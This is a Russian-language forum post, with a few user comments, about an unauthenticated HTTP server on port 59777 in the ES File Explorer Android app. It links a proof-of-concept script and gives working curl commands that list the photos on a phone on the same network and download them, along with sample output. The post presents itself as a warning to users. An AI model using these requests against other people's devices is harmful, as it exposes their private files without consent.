Бэкдор в ES File Explorer File Manager, позволяющий скачать любой файл из твоего телефона
Цель данного поста - предупредить пользователей и предостеречь от использования дырявого говнопродукта, автор не призывает использовать приведённую ниже информацию для получения доступа к чужим данным, т.к. можно получить путёвку на 2 года с бесплатным шампанским.
Недавно нашли бэкдор в ES File Manager, приложение просто создало http сервер не защищённый паролем на порту 59777, который позволяет получить список всех файлов, приложений, скачать файлы, запустить любое из установленных приложений и многое другое, ES File Manager об этом, естественно, никак не предупреждает пользователя. Таким образом, чувак из той же сети(например в маке) может получить доступ ко всем вашим файлам.
Вроде первый написал этот чувак https://twitter.com/fs0c131y/status/1085460755313508352
Вот тут сделали скрипт для работы с сервером https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
Я скрипт не запускал, а воспользовался curl'ом
Пишем:
> curl --header "Content-Type: application/json" -X POST http://192.168.1.3:59777/ --data '{"command":"listPics"}'
Где 192.168.1.3 - IP моего телефона в сети. Получаем список всех фоток на телефоне:
[
{"name":"IMG_20180802_192056_HHT.jpg", "time":"8/2/18 08:20:56 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180802_192056_HHT.jpg", "size":"1.64 MB (1,720,783 Bytes)", },
{"name":"IMG_20180728_160906.jpg", "time":"8/2/18 08:22:02 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180728_160906.jpg", "size":"4.69 MB (4,914,234 Bytes)", },
{"name":"IMG_20180801_120928.jpg", "time":"8/2/18 08:22:02 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180801_120928.jpg", "size":"5.68 MB (5,951,479 Bytes)", },
{"name":"IMG_20180728_132235.jpg", "time":"8/2/18 08:22:04 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180728_132235.jpg", "size":"4.94 MB (5,176,983 Bytes)", },
{"name":"IMG_20180728_155557.jpg", "time":"8/2/18 08:22:04 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180728_155557.jpg", "size":"4.08 MB (4,275,890 Bytes)", },
{"name":"IMG_20180730_103456.jpg", "time":"8/2/18 08:22:04 PM", "location":"/storage/2C7B-180C/DCIM/Camera/IMG_20180730_103456.jpg", "size":"3.60 MB (3,776,144 Bytes)", },
Скачивать вот так:
> curl --header "Content-Type: application/json" http://192.168.1.3:59777/storage/2C7B-180C/DCIM/Camera/IMG_2... > /tmp/pic.jpg
Только что поставил последнюю версию с play маркета, запустил - бекдор есть.
Раньше (лет 5 назад) пользовался этим файловым менеджером, пока его не заговнянили кучей рекламы и бесполезных функций. Такие дыры надо делать в полезных приложениях, а то даже не интересно.
"запустил - бекдор есть"
В любом деле главное стабильность, вот и тут стабильно есть бекдор.
Последние есфайлменеджеры дрянь полная, пользуюсь старым, удобный анализатор памяти в нем, на бэкдоры похуй, к левым сеткам не цепляюсь